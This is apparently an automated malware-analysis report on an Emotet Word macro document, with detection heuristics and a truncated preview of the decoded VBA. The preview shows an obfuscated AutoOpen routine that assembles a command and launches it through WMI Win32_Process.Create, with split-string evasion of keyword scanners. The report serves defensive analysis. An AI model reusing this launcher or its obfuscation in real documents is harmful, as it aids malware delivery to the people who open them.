Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 79a041b550ffa918…

MALICIOUS

Office (OLE)

142.6 KB Created: 2019-05-07 06:40:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 7396542149e1802ad9ba98ce733b1a37 SHA-1: f2a443e2c93642ac2305f0c452b6b8c3c752b8b1 SHA-256: 79a041b550ffa918f27405f205525df208b7e220fe37c7e1993fe297405b5b05
302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for Emotet. The macro utilizes GetObject and CreateObject to instantiate WMI and launch a process, specifically targeting 'winmgmts' for process creation. This indicates the macro's intent is to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6964070-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6964070-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4923 bytes
SHA-256: 07d013dc8e3a355d9fe2cb46ffccf3608fbcbc4fe0c40ad5831a49038ff75185
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "s76753"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "i659_4"
Attribute VB_Base = "0{055885CB-4D23-42A8-9E8E-94D203285A59}{EEE211E3-0AA4-48A5-83A0-BAF936A399F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "H48_782"

Attribute VB_Name = "G385441"

Attribute VB_Name = "C_757645"

Attribute VB_Name = "Z347027"

Attribute VB_Name = "i53486"

Attribute VB_Name = "t2550951"
Attribute VB_Base = "0{012F8316-9F9C-49C0-B0F4-F7B644B4DE4F}{7AC199C1-C367-4731-904F-20D826AB32FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "O53012"
Function J42_489(F58898)
         While v6924051 And w1___490
'H857588s359__A0033180n_863_36
      Wend
         While i7459943 And T1984215
'D50657l58028Z36542s3625924
      Wend
Set J42_489 = CVar(F58898)
         While i292831 And V02095
'h8798_S93423_r94792W_03804
      Wend
         While C9291856 And H_269176
'O034989A0442576z82092k618_51
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While c_8955 And F3026439
'J79106q896224i535311w067_0
      Wend
         While h282879 And n507_2
'V084148z3657578N_82471B5_7536
      Wend
         While Y86_477_ And G094_30
'N8_77680n74901__G_91078_f55021
      Wend
Call X61664
         While Y9884740 And E981060
'p45073K065687E33847z03238
      Wend
         While M469_0_ And I0_2931
'I9360213r376_4_4P234570p3___0
      Wend
         While D7684_ And Y_822219
'v3910444o66562o4921914W04257
      Wend
End Sub


Attribute VB_Name = "C93518"
Function X61664()
On Error Resume Next
         While v366838 And D88_42
'R7142248o7307_2o_2419N_00558
      Wend
         While v7662263 And Z299088
'Q99752_7z396425_w538453K190_33
      Wend
         While f438055 And o29819
'h6157567l637744J05981J46259
      Wend
P115854 = i659_4.P4905_5 + t2550951.z__130 + i659_4.P4905_5.ControlSource + t2550951.K_0_21 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5 + t2550951.M35945 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5.PasswordChar + t2550951.j018245 + i659_4.P4905_5 + t2550951.Z1189_4 + i659_4.P4905_5.ControlTipText
         While D4855741 And V8_0657
'v4559575n05_89t230_91q5396_
      Wend
         While i1_1669_ And b077_014
'w52510__V5539851D40368V8467193
      Wend
         While H2532_ And b078712
'I624411O00354W3621689P982703
      Wend
Set T452521 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess"))
         While q5019527 And c0281_
'j62_649z09419J63872s383411
      Wend
         While q23189 And X832816
'd68362L2429176W56_712i84074
      Wend
         While J773572 And X119_84
'H3536876i_7_965G842717N62115
      Wend
T452521.Create d09064 + P115854 + L97_717, U_015368, u10471, a80964
         While i92_82 And c34_4505
'N364797O081866_T128_1j229202
      Wend
         While w27916 And u4_985
'U83759j898004_V50244_1a836_09
      Wend
End Function

Attribute VB_Name = "O3541311"

Public Function u10471()
         While Z59524 And R2290302
'z_59_0w031543Z8307707o8309_
      Wend
         While G7463_72 And q341043
'j887856K570484G88707V266717
      Wend
         While O726542 And S12124_2
'B3424992o63624l8431503P09025
      Wend
Set u10471 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess" + "S" + "tartup"))
         While D1383169 And X19165
'c522639S67699O1591705R03_991
      Wend
         While G757379 And C01456
'E23862u3736_v92703v1021064
      Wend
c052037 = vbError - vbError
         While
... (truncated)